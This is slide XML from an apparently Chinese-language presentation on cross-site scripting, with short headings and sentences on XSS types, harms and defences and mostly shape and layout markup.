          <a:xfrm>
            <a:off x="4099843" y="3051086"/>
            <a:ext cx="3237166" cy="423577"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="66008" tIns="33052" rIns="66008" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1650" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:alpha val="100000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>XSS攻击类型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="165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5" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4324283" y="3505286"/>
            <a:ext cx="2789491" cy="2115185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="66008" tIns="33052" rIns="66008" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="188000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:alpha val="100000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>XSS攻击种类繁多，包括反射型、存储型和DOM型，各自利用网页开发的不同漏洞进行恶意操作。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">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6" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="959648" y="3051086"/>
            <a:ext cx="3237166" cy="423577"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="66008" tIns="33052" rIns="66008" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1650" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:alpha val="100000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>XSS攻击与危害</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="165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7" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1184088" y="3505286"/>
            <a:ext cx="2789491" cy="2115185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="66008" tIns="33052" rIns="66008" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="188000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:alpha val="100000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>XSS攻击利用网页漏洞注入恶意代码，用户访问时泄露信息，导致账号被盗等严重后果。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">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8" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7333577" y="3051086"/>
            <a:ext cx="3237166" cy="423577"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="66008" tIns="33052" rIns="66008" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1650" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:alpha val="100000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>XSS攻击防护</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="165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9" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7557770" y="3505200"/>
            <a:ext cx="3013075" cy="2115185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="66008" tIns="33052" rIns="66008" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="188000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:alpha val="100000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>学习XSS攻击原理及防护方法，成为保障网络安全的重要一环；通过项目实践，掌握识别与防范技巧。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">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20" name="TextBox 20"/>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XSS攻击详解</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TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3404897" y="1355502"/>
            <a:ext cx="7648575" cy="590550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="123825" tIns="123825" rIns="57150" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="140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渗透测试与防护</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6" name="AutoShape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1190783" y="5672248"/>
            <a:ext cx="668149" cy="117156"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2F89C9">
              <a:alpha val="100000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1140385" y="5672248"/>
            <a:ext cx="117156" cy="117156"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2F89C9">
              <a:alpha val="100000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="AutoShape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1790706" y="5672248"/>
            <a:ext cx="117156" cy="117156"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2F89C9">
              <a:alpha val="100000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Connector 9"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1858932" y="5742952"/>
            <a:ext cx="9767077" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="14288">
            <a:solidFill>
              <a:srgbClr val="2F89C9">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:headEnd type="none"/>
            <a:tailEnd type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3404897" y="1822410"/>
            <a:ext cx="7410450" cy="954405"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="123825" tIns="123825" rIns="57150" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:alpha val="100000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>通过项目深入学习XSS渗透测试与绕过方法，理解XSS攻击机制，构建有效防护策略。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">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1" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1140385" y="3782594"/>
            <a:ext cx="7648575" cy="590550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="123825" tIns="123825" rIns="57150" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="140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XSS防护学习</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2" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1140460" y="4249420"/>
            <a:ext cx="10358120" cy="539115"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="123825" tIns="123825" rIns="57150" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:alpha val="100000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>掌握跨站脚本攻击原理与防护技术，提升网络安全防护能力，确保用户信息安全。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">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3" name="AutoShape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3383524" y="3148967"/>
            <a:ext cx="668149" cy="117156"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2F89C9">
              <a:alpha val="100000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="AutoShape 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3333126" y="3148967"/>
            <a:ext cx="117156" cy="117156"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2F89C9">
              <a:alpha val="100000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="AutoShape 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3983447" y="3148967"/>
            <a:ext cx="117156" cy="117156"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2F89C9">
              <a:alpha val="100000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Connector 16"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4051673" y="3219671"/>
            <a:ext cx="9767077" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="14288">
            <a:solidFill>
              <a:srgbClr val="2F89C9">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:headEnd type="none"/>
            <a:tailEnd type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 17"/>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防护XSS学习</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8877300" y="5857875"/>
            <a:ext cx="3314700" cy="1000125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3314700" h="1000125">
                <a:moveTo>
                  <a:pt x="3314700" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1000125" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="951670" y="1153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="903811" y="4578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="856598" y="10222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="810086" y="18033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="764326" y="27959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719370" y="39946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="675271" y="53944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="632081" y="69898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="589853" y="87758"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="548640" y="107470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="508492" y="128982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="469464" y="152243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="431607" y="177198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394974" y="203797"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="359617" y="231986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325588" y="261713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="292941" y="292926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="261727" y="325573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231998" y="359601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203808" y="394957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="177208" y="431590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152252" y="469446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128991" y="508475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107477" y="548622"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="87764" y="589836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69903" y="632064"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53947" y="675255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39949" y="719355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27961" y="764312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18034" y="810074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10223" y="856588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4578" y="903803"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1153" y="951665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1000122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3314700" y="1000124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3314700"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3" name="Freeform 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9186926" y="5424551"/>
            <a:ext cx="3005455" cy="1433830"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3005454" h="1433829">
                <a:moveTo>
                  <a:pt x="120209" y="1433448"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="89849" y="1374297"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71583" y="1332494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55258" y="1289692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40930" y="1245945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28654" y="1201308"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18486" y="1155837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10481" y="1109588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4695" y="1062616"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1183" y="1014976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="966724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1183" y="918471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4695" y="870831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10481" y="823859"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18486" y="777611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28654" y="732142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40930" y="687507"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55258" y="643761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71583" y="600960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89849" y="559160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="110002" y="518416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131985" y="478782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="155744" y="440315"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="181223" y="403070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208367" y="367101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="237120" y="332466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267427" y="299218"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="299233" y="267413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="332481" y="237107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="367117" y="208355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="403086" y="181213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="440332" y="155735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="478799" y="131977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="518432" y="109995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="559177" y="89843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="600976" y="71577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="643776" y="55254"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="687520" y="40926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="732154" y="28652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="777622" y="18485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="823868" y="10480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="870837" y="4695"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="918474" y="1182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="966724" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3005074" y="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 name="Freeform 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="110680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 name="Freeform 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1090612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 name="Freeform 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107346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 name="Freeform 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="105727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 name="Freeform 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10429875" y="5648325"/>
            <a:ext cx="19050" cy="419100"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="19050" h="419100">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="419100"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="381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9" name="Freeform 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="102393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0" name="Freeform 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11482451" y="2908195"/>
            <a:ext cx="709930" cy="1092835"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="709929" h="1092835">
                <a:moveTo>
                  <a:pt x="0" y="1092304"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="949" y="1044230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3772" y="996637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8435" y="949562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14900" y="903040"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23133" y="857107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33098" y="811799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44758" y="767150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58079" y="723198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73024" y="679978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89558" y="637525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107645" y="595875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="127250" y="555064"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148336" y="515128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="170868" y="476102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194811" y="438022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="220128" y="400924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246784" y="364843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274743" y="329815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="303969" y="295876"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334427" y="263062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="366081" y="231408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="398895" y="200950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="432834" y="171723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="467862" y="143764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="503943" y="117109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="541041" y="91792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="579121" y="67849"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="618147" y="45317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="658083" y="24231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="698894" y="4626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="709549"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1" name="Freeform 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11482451" y="4000500"/>
            <a:ext cx="709930" cy="1092835"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="709929" h="1092835">
                <a:moveTo>
                  <a:pt x="709549" y="1092410"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="658083" y="1068174"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="618147" y="1047084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="579121" y="1024547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="541041" y="1000601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="503943" y="975279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="467862" y="948619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="432834" y="920655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="398895" y="891425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="366081" y="860962"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334427" y="829303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="303969" y="796484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274743" y="762541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246784" y="727508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="220128" y="691423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194811" y="654320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="170868" y="616236"/>
                </a:lnTo>
                <a:lnTo>
